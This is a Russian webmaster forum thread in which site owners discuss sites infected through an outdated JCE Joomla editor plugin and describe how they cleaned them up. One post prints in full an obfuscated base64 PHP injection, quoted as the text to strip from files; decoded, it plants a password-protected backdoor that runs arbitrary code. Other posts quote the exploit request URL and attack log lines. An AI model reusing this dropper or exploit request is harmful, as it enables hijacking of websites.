web-masteru.ogkuipt.ru/bezopasnost-sajta/vosstanovlenie-sajta/17-vosstanovlenie-sajta-posle-zarazheniya-vredonosnym-kodomпопробуй с этого сайта скачать скрипт, может тот не рабочий. я здесь качала ( в самом низу "Современный метод") у меня без ошибок находил.
Проблемы с сайтом, внедрены вредоностные коды на сайте
Проблемы с сайтом, внедрены вредоностные коды на сайте
|
#61
23 Декабря 2012 21:55
|
|
#62
24 Декабря 2012 01:51
так зачем качать скрипт если вы его скачали так скиньте его сюда..
людей не ведитесь сами подумайте если человек скачал скрипт то он может их выложить сюда... просто реклама... вирус там... |
|
#63
24 Декабря 2012 06:00
со скриптом разобрался...все поудалял
есть еще одно, теперь раз в полчаса наблюдаю такую картину в логах 213.171.204.130 - - [24/Dec/2012:00:41:17 +0400] "GET /administrator/ HTTP/1.0" 303 - "-" "9my6NnYWKgtu" 213.171.204.130 - - [24/Dec/2012:00:41:18 +0400] "POST /administrator/ HTTP/1.0" 200 13 "-" "9my6NnYWKgtu" пытаются в админку залезть ? админку скрыл через кодовое слово... знатоки объясните ? |
|
#64
24 Декабря 2012 11:30
Была проблема, началась именно 19 декабря. В-общем, вроде решил. Рассказываю.
Заражение происходит через JCE старой версии. В логах веб-сервера строка index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a6081f4fe1f5ac65c1246b5f=9d09f693c63c1960a9f8a564e0da7743. Как потом прочитал на каком то форуме, у людей было аналогичное заражение. Получается, что внедряется код на сайт через уязвимость в JCE. Решение - обновить JCE (я нашёл и скачал версию 2.3.1 и даже с русификатором). По поводу заражённых сайтов: 1. Если есть бекап - восстановить из него. 2. Если нет бэкапа - я не стал мучаться с удалением из файлов js вредоносных вставок iframe, а просто перезалил сами js-файлы (их можно взять из соответствующего дистрибутива Джумлы). Кроме того, надо обязательно удалить ВСЕ php файлы из директории images и вложенных в неё (если только там нету Ваших php-файлов, которые Вы непонятно зачем разместили в папке images). После восстановления сайта, как я уже писал выше - обновить JCE |
|
#65
24 Декабря 2012 14:01
JustHost начал регистрировать вирусы вчера. Сообщение моего хостера (переведено):
Сайт на WordPress раздулся в три раза больше - видимо вирус плодится. Сижу ничего не делаю - не могу никак начать - страшно, много работы! Похоже некоторые справляются. Читал, что: - могут быть изменены файлы для заражения в будущем. - могут быть украдены пароли. Значит нужно по любому восстанавливать из бэкапов до 19 дек? Интересно, распространяется ли зараза на саму CPanel? Интересно, какие пароли ворует вирус? |
|
#66
24 Декабря 2012 14:27
Я удалил php файлы с вирусами, и восстановил полный бекап хостера.
Удалил JCE. Сайтов порядка 15 штук, чистить все эти JS нужно было бы очень долго. Сейчас настраиваю VPS, что бы там разделить сайты промеж себя, что бы в дальнейшем при взломе одного сайта другие не страдали. |
|
#67
9 Января 2013 11:54
У меня заражение произошло чуть позже 25 декабря. Первое что сделал: откат файлов, удалил JCE, поменял все пароли в том числе и имя базы и пароль к ней, установил jce 2.3.1. Спустя несколько дней ситуация повторилась, тот же вирус. Опять же восстановил файлы, и еще раз удалил JCE 2.3.1, пока заражения не было. Сейчас боюсь устанавливать JCE...
Изменено:
Игорь Брянцев - 9 Января 2013 12:29
|
|
#68
15 Февраля 2013 10:07
во все js файлы была добавлена строка
и т.д там много было с этого ip, в .htaccess поставил запрет на него. может кто что посоветует еще надо сделать? |
|
#69
15 Февраля 2013 13:39
была такая байда.1. Выкачал все через фтп
2. Скачал эту программку http://www.interestprograms.ru/programs/applications/easyreplacetext.html 3. вставил ---- eval(base64_decode(\"QGluaV9zZXQoJ2FsbG93X3VybF9mb3BlbicsIDEpOw0KDQphZGRMb2FkZXIoKTsNCiRkYXRhID0gQG9wZW5kaXIoJy4nKTsNCg0Kd2hpbGUgKCRmaWxlID0gQHJlYWRkaXIoJGRhdGEpKQ0Kew0KCSRmaWxlID0gdHJpbSgkZmlsZSk7DQoJaWYgKCEkZmlsZSB8fCBwcmVnX21hdGNoKCcvXlwuKyQvJywgJGZpbGUpIHx8ICFpc19kaXIoJGZpbGUpKSBjb250aW51ZTsNCglhZGRMb2FkZXIoJGZpbGUpOw0KfQ0KDQpAY2xvc2VkaXIoJGRhdGEpOw0KDQpmdW5jdGlvbiBhZGRMb2FkZXIoJGRpciA9ICcnKQ0Kew0KICAgIGlmICgkZGlyKSAkZGlyIC49ICcvJzsNCiAgICBAY2htb2QoJGRpciwgNzc3KTsNCiAgICBAc3lzdGVtKCJjaG1vZCA3NzcgJGRpciIpOw0KICAgIA0KICAgICRmcCA9IGZvcGVuKCJ7JGRpcn0xMzM2MWRjZTQwOWM1YjU3ZGI3OTRlZmRhYjJjMWU4OC5waHAiLCAidyIpOyANCiAgICBmd3JpdGUoJGZwLCBiYXNlNjRfZGVjb2RlKCdQRDl3YUhBTkNnMEtRR2x1YVY5elpYUW9KMkZzYkc5M1gzVnliRjltYjNCbGJpY3NJREVwT3cwS1FHbHVhVjl6WlhRb0oyUmxabUYxYkhSZmMyOWphMlYwWDNScGJXVnZkWFFuTENBMk1DazdEUXBBYVc1cFgzTmxkQ2duYldGNFgyVjRaV04xZEdsdmJsOTBhVzFsSnl3Z05qQXBPdzBLUUhObGRGOTBhVzFsWDJ4cGJXbDBLRFl3S1RzTkNnMEtKR1JoZEdFZ1BTQkFkVzV6WlhKcFlXeHBlbVVvWW1GelpUWTBYMlJsWTI5a1pTaDBjbWx0S0VBa1gxQlBVMVJiSjJSaGRHRW5YU2twS1RzTkNnMEthV1lnS0VBaGFYTmZZWEp5WVhrb0pHUmhkR0VwSUh4OElHMWtOU2drWkdGMFlWc25jR0Z6YzNkdmNtUW5YU2tnSVQwZ0oyUXpaR1kwTXpsak0yVTBZakpqTkRFNU1qQmtPR1V5TnpNek1URXpNak0ySnlrZ1pYaHBkRHNOQ21sbUlDaEFKR1JoZEdGYkoyTnZaR1VuWFNrZ1pYWmhiQ2hpWVhObE5qUmZaR1ZqYjJSbEtDUmtZWFJoV3lkamIyUmxKMTBwS1RzTkNtbG1JQ2hBSkdSaGRHRmJKMk5vWldOclgyTnZaR1VuWFNrZ2NISnBiblFnSkdSaGRHRmJKMk5vWldOclgyTnZaR1VuWFRzTkNnMEtQejQ9JykpOw0KCWZjbG9zZSgkZnApOw0KDQoJaWYgKGZpbGVfZXhpc3RzKCJ7JGRpcn0xMzM2MWRjZTQwOWM1YjU3ZGI3OTRlZmRhYjJjMWU4OC5waHAiKSkNCgl7DQogICAgICAgICRjayA9ICIxODIzNjQ5MzY1ODIwMzU0IjsNCgkgICAgcHJpbnQgIiRjazp7Kn06JGRpcjp7Kn06IjsNCgkJZXhpdDsNCgl9DQp9\")); ?>" ------Заменить на пустоту во всех файлах. ---- 4. Залил обратно чистые файлы. Три месяца уже никаких проблем. Говорят айболит от такой байды хорошо помогает, но у меня не хватило знаний его настроить:( |
|
#70
19 Февраля 2013 17:08
Тоже наблюдаю периодически такое, в папке images/stories появляются то .php то .txt файлы. Как я понял они лезут через редактор (сегодня попробовал в самом редакторе сделать такое: размер для загрузки файлов поставил 0) кто что думает поможет или нет?
Изменено:
Bald - 19 Февраля 2013 17:33
|
|
#71
8 Марта 2013 21:26
Может кто посоветует...Похожая проблема.Сайт на ДЛЕ.
Началось примерно месяц назад.Яндекс прислал письмо о вред.коде на сайте. Все пересмотрели,что-то удалили, заменили jquaery,через пару дней Яндекс написал,что все ОК,кода нет... Через 2 дня--опять,что вред.код! Тут в супре я посмотрел все сайты на этом хостинге--через одного --вредоносный код. Я написал хостеру--он мне прислал отчет-проверка сервера-все ок! Через пару дней опять--вредоносный код на сайте! Потом через 2 часа!!!---Яндекс пишет,что все ок,вредоносного кода нет, а выглядел он так-то и так-то..Но никаких ,естественно работ на сайте мы не производили.....Ничего не делали.... Так меня это уже все достало,вот уже Яндекс раз 10-тый присылает ,то есть код,то нету. Может кто поможет разобраться |
|
#72
8 Марта 2013 22:07
andrey p.s, зайдите на оф. сайт и скачайте заплатки для движка, плюс темы по интернету есть какие файлы надо проверять при заражении.
|
|
#73
8 Марта 2013 22:45
|
||||
Похожие темы:
| 17.12.2017 18:24 | Проблемы с безопасным соединением |
| 06.08.2017 19:21 | Помогите с сайтом |
| 01.04.2016 09:36 | Помогите с сайтом, вирус наверно завелся |
| 26.05.2014 12:23 | Помогите понять природу проблемы |
| 09.04.2014 17:15 | Прблемы с сайтом |
Читают тему (гостей: 2, пользователей: 0, из них скрытых: 0)
Апдейты
- Яндекс ИКС
23.11.2023 (441 день назад) - Яндекс выдача
05.09.2024 (154 дня назад)
Доска объявлений
Купить / Продать
Работа / Услуги
Интересные темы
Интернет новости
Инструменты